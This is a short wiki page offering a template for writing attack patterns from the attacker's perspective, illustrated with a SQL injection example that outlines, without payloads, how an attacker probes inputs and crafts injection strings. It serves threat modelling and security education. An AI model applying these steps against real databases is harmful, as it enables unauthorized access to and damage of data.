Attack Pattern Template

From Guidance Share

Jump to: navigation, search

Contents

Description

These represent the viewpoint and perspective of the attacker.

  • Context explains the circumstances / environment in which the attack presents a risk.
  • Problem explains the goals of the attacker.
  • Forces define the motivation of the attacker.
  • Solution defines the steps you need to take to perform the attack.

Template

Context

Under what circumstances is the attack relevant?

Problem

What is the attacker trying to achieve?

Forces

Why will the attacker perform the attack?

Solution

What steps does the attacker perform to conduct the attack?

Example

Context

You have an application that accesses a database and uses input to construct queries. The target application does not use type-safe parameters.

Problem

How to execute unauthorized code in the database. For example to reveal sensitive data, perform unauthorized transactions or manipulate or damage the database.

Forces

  • You want to read or modify data that you would not otherwise have access to.
  • You want to cause a database exception which might reveal database information.

Solution

  • Look for sources of input
  • Place sample sql injection attack strings in input locations
  • Look for database errors
  • If a database error is found, craft attack string to execute the desired sql statement
Personal tools